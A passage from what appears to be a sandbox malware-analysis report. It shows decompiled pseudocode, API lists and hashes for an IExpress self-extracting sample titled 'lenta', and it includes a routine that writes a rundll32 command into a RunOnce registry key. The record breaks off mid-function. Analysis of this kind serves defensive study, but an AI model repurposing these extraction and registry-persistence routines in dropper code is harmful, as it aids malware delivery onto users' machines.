                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v269;
                                                                                                                                                                                                                                                				CHAR* _v276;
                                                                                                                                                                                                                                                				int _v280;
                                                                                                                                                                                                                                                				void* _v284;
                                                                                                                                                                                                                                                				int _v288;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                				int _t45;
                                                                                                                                                                                                                                                				int* _t50;
                                                                                                                                                                                                                                                				CHAR* _t52;
                                                                                                                                                                                                                                                				CHAR* _t61;
                                                                                                                                                                                                                                                				char* _t62;
                                                                                                                                                                                                                                                				int _t63;
                                                                                                                                                                                                                                                				CHAR* _t64;
                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t52 = __ecx;
                                                                                                                                                                                                                                                				_t23 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                                				_t62 = _a4;
                                                                                                                                                                                                                                                				_t50 = 0;
                                                                                                                                                                                                                                                				_t61 = __ecx;
                                                                                                                                                                                                                                                				_v276 = _t62;
                                                                                                                                                                                                                                                				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                                				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                                					_t63 = 0x104;
                                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t64 = _t62 + 1;
                                                                                                                                                                                                                                                					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                                					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                                					_t63 = 0x104;
                                                                                                                                                                                                                                                					_t34 = _v269;
                                                                                                                                                                                                                                                					if(_t34 == 0x53) {
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_t34 == 0x57) {
                                                                                                                                                                                                                                                							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_push(_t52);
                                                                                                                                                                                                                                                							_v288 = 0x104;
                                                                                                                                                                                                                                                							E00051781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                                							_t59 = 0x104;
                                                                                                                                                                                                                                                							E0005658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                                							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                                								_t59 = _t63;
                                                                                                                                                                                                                                                								E0005658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								if(RegQueryValueExA(_v284, 0x51140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                                									_t45 = _v280;
                                                                                                                                                                                                                                                									if(_t45 != 2) {
                                                                                                                                                                                                                                                										L9:
                                                                                                                                                                                                                                                										if(_t45 == 1) {
                                                                                                                                                                                                                                                											goto L10;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                											_t45 = _v280;
                                                                                                                                                                                                                                                											goto L9;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t59 = 0x104;
                                                                                                                                                                                                                                                											E00051680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                                											L10:
                                                                                                                                                                                                                                                											_t50 = 1;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								RegCloseKey(_v284);
                                                                                                                                                                                                                                                								L15:
                                                                                                                                                                                                                                                								if(_t50 == 0) {
                                                                                                                                                                                                                                                									goto L16;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(5A679BD9,00000000,00000000,00000000), ref: 000527A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 000527B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 000527BC
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000528A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000528AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 000528B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000527E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: 3005c3aba88c938780cc679c25dd8937c8a3f77c29a3902d0b171418ba6ad5df
                                                                                                                                                                                                                                                • Instruction ID: adefbeffc6f193a2853ad98fcdeaa52a992b9ae6c437c37ac8c3649845f9026d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3005c3aba88c938780cc679c25dd8937c8a3f77c29a3902d0b171418ba6ad5df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1841A571A0122CAFEB649B649C45BFB7BBDEF16702F0040A5F945D2141DB744E898FA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E00052267() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v836;
                                                                                                                                                                                                                                                				void* _v840;
                                                                                                                                                                                                                                                				int _v844;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t42;
                                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t19 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				if( *0x58530 != 0) {
                                                                                                                                                                                                                                                					_push(_t49);
                                                                                                                                                                                                                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                                						_push(_t38);
                                                                                                                                                                                                                                                						_v844 = 0x238;
                                                                                                                                                                                                                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                                							_push(_t47);
                                                                                                                                                                                                                                                							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                								E0005658A( &_v268, 0x104, 0x51140);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                                							E0005171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                                							_t42 =  &_v836;
                                                                                                                                                                                                                                                							_t45 = _t42 + 1;
                                                                                                                                                                                                                                                							_pop(_t47);
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t33 =  *_t42;
                                                                                                                                                                                                                                                								_t42 = _t42 + 1;
                                                                                                                                                                                                                                                							} while (_t33 != 0);
                                                                                                                                                                                                                                                							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                                						_pop(_t38);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_pop(_t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000522A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 000522D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 000522F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00052305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0005236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0005237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00052321
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0005232D
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00052299
                                                                                                                                                                                                                                                • wextract_cleanup0, xrefs: 0005227C, 000522CD, 00052363
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                                • API String ID: 3027380567-2554356261
                                                                                                                                                                                                                                                • Opcode ID: 084f5af49385e6bb59ff836adb2a8795592acc0998d7ffa5a5afc985af507b9b
                                                                                                                                                                                                                                                • Instruction ID: b2216b45ee17a129bab37a407d62225f04053560cf2dfc55d157e704f6074d15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 084f5af49385e6bb59ff836adb2a8795592acc0998d7ffa5a5afc985af507b9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D931B471A00218ABDF619B60DC49FEB7B7CEF15742F0001A9BD0DAA051EA75AB8CCB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E00053100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				struct HWND__* _t16;
                                                                                                                                                                                                                                                				struct HWND__* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					if( *0x58590 == 0) {
                                                                                                                                                                                                                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                                						 *0x58590 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t8 - 1;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                					EndDialog(_a4, ??);
                                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                                				if(_t15 == 0) {
                                                                                                                                                                                                                                                					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t33 = _a4;
                                                                                                                                                                                                                                                					E000543D0(_t33, _t16);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t33, 0x834,  *0x58d4c);
                                                                                                                                                                                                                                                					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                                					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                                					 *0x588b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                                					SetWindowLongA(_t34, 0xfffffffc, E000530C0);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t15 != 1) {
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_a12 != 6) {
                                                                                                                                                                                                                                                					if(_a12 != 7) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0005313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0005314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0005316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00053176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0005317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 00053185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00053190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,000530C0), ref: 000531A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000531CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 7db29a542b590c046da3eff455d07dcc5b1590e8c933f05e75e84df082e08c50
                                                                                                                                                                                                                                                • Instruction ID: f7a40a92bc8c054692a2e87561952910999ad2c216c6ac2786af379d23201e51
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7db29a542b590c046da3eff455d07dcc5b1590e8c933f05e75e84df082e08c50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4011A231244B11BBEB215B349C0DB9B3AA4FB47763F104710FD15A51E0DB788A45C75A
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E0005468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				CHAR* _t14;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				long _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 = __ecx;
                                                                                                                                                                                                                                                				_t11 = __edx;
                                                                                                                                                                                                                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                                				_t16 = _t4;
                                                                                                                                                                                                                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                                					if(_t16 == 0) {
                                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                                					FreeResource(_t15);
                                                                                                                                                                                                                                                					return _t16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                • Opcode ID: fbf3f54bfc3780143d0ba5c4222276f2c2706c70ad3381c1e2ca944b10b0ba1a
                                                                                                                                                                                                                                                • Instruction ID: 2247f93a2d031dc4c80df6b07a0cf372dc1f634e1938e55febcb55457c5aca1b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbf3f54bfc3780143d0ba5c4222276f2c2706c70ad3381c1e2ca944b10b0ba1a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B00181363443107BF3601BA56C4DFAB7E6CDBCBB67F040214FE4996190D9A5888986A7
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E000517EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                                				intOrPtr* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				signed int _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t37 = __ecx;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v28 = __ecx;
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                                					_v20 = _t20;
                                                                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                                                                						 *_t37 = 0;
                                                                                                                                                                                                                                                						_t28 = 1;
                                                                                                                                                                                                                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                                							_t37 = _t39;
                                                                                                                                                                                                                                                							 *0x5a288(0, _v24, _v28);
                                                                                                                                                                                                                                                							_v20();
                                                                                                                                                                                                                                                							if(_t39 != _t39) {
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							FreeSid(_v24);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					FreeLibrary(_t36);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000518DD), ref: 0005181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0005182C
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(000518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000518DD), ref: 00051855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,000518DD), ref: 00051883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,000518DD), ref: 0005188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: 594102fff5da1f8c8a443d96cf953c8ecb1a39dd01f01bc50634d6f6cd1d024e
                                                                                                                                                                                                                                                • Instruction ID: d4d719a43aff98660e110e8a76e1348f7b34e157a679f17dd5c9b54bca308a7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 594102fff5da1f8c8a443d96cf953c8ecb1a39dd01f01bc50634d6f6cd1d024e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE118131F00309ABEB109FA4DC49BBFBBB8EF45712F100569FA11E3290DA759D048B91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00053450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				struct HWND__* _t12;
                                                                                                                                                                                                                                                				int _t22;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t7 == 0) {
                                                                                                                                                                                                                                                					EndDialog(_a4, 2);
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t24 = _a4;
                                                                                                                                                                                                                                                					E000543D0(_t24, _t12);
                                                                                                                                                                                                                                                					SetWindowTextA(_t24, "lenta");
